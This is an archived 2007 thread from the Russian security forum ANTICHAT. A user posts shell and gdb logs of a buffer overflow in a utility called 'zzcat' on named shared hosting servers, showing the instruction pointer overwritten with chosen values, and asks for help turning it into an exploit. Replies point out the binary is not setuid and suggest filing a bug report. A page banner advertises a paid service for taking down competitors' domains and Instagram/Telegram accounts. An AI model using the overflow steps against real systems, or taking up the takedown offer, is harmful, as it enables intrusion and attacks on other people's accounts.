УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
Buffer Overflows

Опции темы

Поиск в этой теме

Опции просмотра

Buffer Overflows

16.03.2007, 10:46

Dmcox

Новичок

Регистрация: 18.12.2005

Сообщений: 11

Провел на форуме:
97865

Репутация: 11

Отправить сообщение для Dmcox с помощью ICQ

Buffer Overflows

Нашел багу в прогe zzcat ## <-Buffer Overflows->##

Вот лог )))

FreeBSD server10.ehostsource.com 4.10-RELEASE-p5 FreeBSD 4.10-RELEASE-p5 #0: Thu Dec 16 10:23:35 EST 2004 root@server10.ehostsource.com:/usr/obj/usr/src/sys/EASYADMIN i386

-bash-2.05b$ zzcat `perl -e "print 'A'x1040"`
Segmentation fault (core dumped)

-bash-2.05b$ gdb -c zzcat.core

Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbfbff62f -1077938641
edx 0xbfbff689 -1077938551
ebx 0x2806bf58 671530840
esp 0xbfbff688 0xbfbff688
ebp 0xbfbff7a8 0xbfbff7a8
esi 0xbfbff7a8 -1077938264
edi 0x1 1
eip 0x41414141 0x41414141

-bash-2.05b$ zzcat `perl -e 'print "\x90"x1036 , "\x44\x33\x22\x11"'`

Segmentation fault (core dumped)

-bash-2.05b$ gdb -c zzcat.core

Program terminated with signal 11, Segmentation fault.
#0 0x11223344 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbfbff62f -1077938641
edx 0xbfbff689 -1077938551
ebx 0x2806bf58 671530840
esp 0xbfbff688 0xbfbff688
ebp 0xbfbff7a8 0xbfbff7a8
esi 0xbfbff7a8 -1077938264
edi 0x1 1
eip 0x11223344 0x11223344

######################################
######################################
-jailshell-2.05b$ uname -a
Linux neit11.nsserver.net 2.4.20-021stab022.8.777-enterprise #1 SMP Fri Nov 12 10:42:02 MSK 2004 i686 i686 i386 GNU/Linux

-jailshell-2.05b$ zzcat `perl -e "print 'A'x4118"`

Segmentation fault (core dumped)

Нужна ваша помощь в продолжении )))

С Уважением Dmcox )))

16.03.2007, 11:11

Alexsize

Fail

Регистрация: 17.09.2005

Сообщений: 2,242

Провел на форуме:
9089375

Репутация: 4268

Так. а смысл? Прога суидная? Или есть вариант выполнять код в пространстве ядра?

16.03.2007, 11:39

hsi

Участник форума

Регистрация: 11.09.2006

Сообщений: 239

Провел на форуме:
626169

Репутация: 167

Может zcat?
В любом случае утилита пользовательского уровня. Опыт конечно неплохой, но лучше отправь баг-репорт разработчику.

16.03.2007, 12:34

Dmcox

Новичок

Регистрация: 18.12.2005

Сообщений: 11

Провел на форуме:
97865

Репутация: 11

Цитата:

Сообщение от hsi

Нет именно zzcat )))

16.03.2007, 12:39

Dmcox

Новичок

Регистрация: 18.12.2005

Сообщений: 11

Провел на форуме:
97865

Репутация: 11

Цитата:

Сообщение от Alexsize

Так. а смысл? Прога суидная? Или есть вариант выполнять код в пространстве ядра?

НЕТ не суидная смысл самой баги )))

17.03.2007, 12:20

Dmcox

Новичок

Регистрация: 18.12.2005

Сообщений: 11

Провел на форуме:
97865

Репутация: 11

Так что помочь не кто не желает кстати во втором случае помойму вазможно Heap Overflow если что стучитесь в ICQ ))))

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Errors, Vulnerabilities & Exploits explained	ATFakep	Forum for discussion of ANTICHAT	0	09.03.2007 22:46
Microsoft Visual C++ 6.0 SP6 resource compiler buffer overflow	_Great_	Реверсинг	0	25.01.2007 11:30
NVidia Binary Graphics Driver For Linux Buffer Overflow Exploit	Goudini	Защита ОС: вирусы, антивирусы, файрволы.	0	18.10.2006 14:13
Microsoft Internet Explorer MHTML URI Buffer Overflow Vulnerability	NeMiNeM	Forum for discussion of ANTICHAT	1	08.06.2006 17:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход